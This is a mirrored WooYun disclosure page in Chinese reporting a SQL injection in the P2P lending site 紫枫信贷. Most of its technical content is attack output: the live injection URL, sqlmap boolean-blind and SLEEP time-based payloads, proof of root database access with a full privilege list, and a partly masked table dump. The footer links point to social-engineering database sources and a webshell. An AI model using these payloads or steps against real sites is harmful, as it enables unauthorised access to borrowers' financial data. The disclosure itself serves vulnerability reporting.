p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0125255
漏洞标题:p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
相关厂商:紫枫信贷
漏洞作者:DloveJ
提交时间:2015-07-08 11:08
公开时间:2015-08-22 11:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
漏洞详情
披露状态:
2015-07-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
详细说明:
|
1 |
注入点:http://www.zfxindai.cn/event/index/id/1.html |
sqlmap
|
1 2 3 4 5 6 7 8 9 |
Place: URI<br> Parameter: #1*<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://www.zfxindai.cn:80/event/index/id/1) AND 9275=9275 AND (8214<br> =8214.htmlType: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: http://www.zfxindai.cn:80/event/index/id/1) AND SLEEP(5) AND (5803=<br> 5803.html<br>--- |
|
1 |
current user: 'root@%' |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 |
database management system users privileges:<br> [*] %root% (administrator) [26]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE<br> [*] %ucloudbackup% (administrator) [28]:<br> privilege: ALTER<br> privilege: ALTER ROUTINE<br> privilege: CREATE<br> privilege: CREATE ROUTINE<br> privilege: CREATE TABLESPACE<br> privilege: CREATE TEMPORARY TABLES<br> privilege: CREATE USER<br> privilege: CREATE VIEW<br> privilege: DELETE<br> privilege: DROP<br> privilege: EVENT<br> privilege: EXECUTE<br> privilege: FILE<br> privilege: INDEX<br> privilege: INSERT<br> privilege: LOCK TABLES<br> privilege: PROCESS<br> privilege: REFERENCES<br> privilege: RELOAD<br> privilege: REPLICATION CLIENT<br> privilege: REPLICATION SLAVE<br> privilege: SELECT<br> privilege: SHOW DATABASES<br> privilege: SHOW VIEW<br> privilege: SHUTDOWN<br> privilege: SUPER<br> privilege: TRIGGER<br> privilege: UPDATE |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
<mask>***** zfxi*****<br> *****tab*****<br> *****-------*****<br> ***** *****<br> *****log *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****e *****<br> *****d_rule *****<br> *****k *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****book *****<br> *****oans *****<br> *****efund *****<br> *****isk *****<br> ***** *****<br> ***** *****<br> *****ion *****<br> *****ion_log*****<br> *****ons *****<br> *****achment*****<br> *****ribute *****<br> *****h_exten*****<br> *****h_group*****<br> *****h_group*****<br> *****h_rule *****<br> *****tar *****<br> *****egory *****<br> *****nnel *****<br> *****ck_info*****<br> *****fig *****<br> *****trict *****<br> *****field *****<br> *****ument *****<br> *****ument_a*****<br> *****ument_d*****<br> *****nt *****<br> *****nt_atte*****<br> *****nt_type*****<br> *****ld *****<br> *****ld_grou*****<br> *****ld_sett*****<br> *****e *****<br> *****low *****<br> *****um *****<br> *****um_book*****<br> *****um_lzl_*****<br> *****um_post*****<br> *****um_post*****<br> *****ks *****<br> *****ue *****<br> *****ue_cont*****<br> *****al_comm*****<br> *****ber *****<br> *****u *****<br> *****sage *****<br> *****el *****<br> *****ture *****<br> *****nt_log *****<br> *****k *****<br> *****k_user *****<br> *****_rule *****<br> *****p *****<br> *****p_addre*****<br> *****p_buy *****<br> *****p_categ*****<br> *****p_confi*****<br> *****p_log *****<br> *****p_see *****<br> *****port *****<br> *****c_login*****<br> *****k *****<br> *****k_messa*****<br> *****k_messa*****<br> *****k_push *****<br> *****nyi_ver*****<br> *****nter_ad*****<br> *****nter_me*****<br> *****nter_se*****<br> ***** *****<br> *****r_token*****<br> *****e *****<br> *****e_recor*****<br> *****bo *****<br> *****bo_comm*****<br> *****bo_top *****<br> *****info *****<br> ***** *****<br> *****pply *****<br> ***** *****<br> *****comment*****<br> *****member *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****efund *****<br> *****tar *****<br> ***** *****<br> ***** *****<br> *****ert *****<br> *****st *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****s *****<br> *****ce *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****eport *****<br> *****oup *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****pay *****<br> *****ay *****<br> ***** *****<br> ***** *****<br> *****ail *****<br> ***** *****<br> *****-------*****<br></mask> |
163个表,我就不跑了。展示一部分表
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 |
<mask>*****isk *****<br> ***** *****<br> ***** *****<br> *****ion *****<br> *****ion_log*****<br> *****ons *****<br> *****achment*****<br> *****ribute *****<br> *****h_exten*****<br> *****h_group*****<br> *****h_group*****<br> *****h_rule *****<br> *****tar *****<br> *****egory *****<br> *****nnel *****<br> *****ck_info*****<br> *****fig *****<br> *****trict *****<br> *****field *****<br> *****ument *****<br> *****ument_a*****<br> *****ument_d*****<br> *****nt *****<br> *****nt_atte*****<br> *****nt_type*****<br> *****ld *****<br> *****ld_grou*****<br> *****ld_sett*****<br> *****e *****<br> *****low *****<br> *****um *****<br> *****um_book*****<br> *****um_lzl_*****<br> *****um_post*****<br> *****um_post*****<br> *****ks *****<br> *****ue *****<br> *****ue_cont*****<br> *****al_comm*****<br> *****ber *****<br> *****u *****<br> *****sage *****<br> *****el *****<br> *****ture *****<br> *****nt_log *****<br> *****k *****<br> *****k_user *****<br> *****_rule *****<br> *****p *****<br> *****p_addre*****<br> *****p_buy *****<br> *****p_categ*****<br> *****p_confi*****<br> *****p_log *****<br> *****p_see *****<br> *****port *****<br> *****c_login*****<br> *****k *****<br> *****k_messa*****<br> *****k_messa*****<br> *****k_push *****<br> *****nyi_ver*****<br> *****nter_ad*****<br> *****nter_me*****<br> *****nter_se*****<br> ***** *****<br> *****r_token*****<br> *****e *****<br> *****e_recor*****<br> *****bo *****<br> *****bo_comm*****<br> *****bo_top *****<br> *****info *****<br> ***** *****<br> *****pply *****<br> ***** *****<br> *****comment*****<br> *****member *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****g *****<br> ***** *****<br> ***** *****<br> *****efund *****<br> *****tar *****<br> ***** *****<br> ***** *****<br> *****ert *****<br> *****st *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****s *****<br> *****ce *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****eport *****<br> *****oup *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> ***** *****<br> *****pay *****<br> *****ay *****<br> ***** *****<br> ***** *****<br> *****ail *****<br> ***** *****<br> *****-------*****<br></mask> |
随便看一下其中的内容
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<mask>*****lub_me*****<br> *****lum*****<br> *****---------*****<br> ***** *****<br> *****---------*****<br> ***** *****<br> *****10) unsig*****<br> *****(16) *****<br> *****(10) *****<br> *****umint(8) *****<br> *****int(3) un*****<br> *****10) unsig*****<br> *****--------*****<br></mask> |
非法的是我不敢,拒绝查水表
漏洞证明:
给高rank就可以不。
修复方案:
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
评价
-
2010-01-01 00:00 0x 80 白帽子 | Rank:967 漏洞数:111)
小伙子
2010-01-01 00:00 博远山人 白帽子 | Rank:0 漏洞数:0)紫枫信贷不仅仅是注入的问题
原文连接:p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
- N/A
- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 社工库源码大全(持续更新)
- 谷歌识图,以图搜图
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 怎么用图片搜索番号?
- 404.php webshell
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 用uBlock Origin过滤广告,享受最好的广告拦截体验
扫码分享
验证:
体验盒子扫码分享
打赏零钱
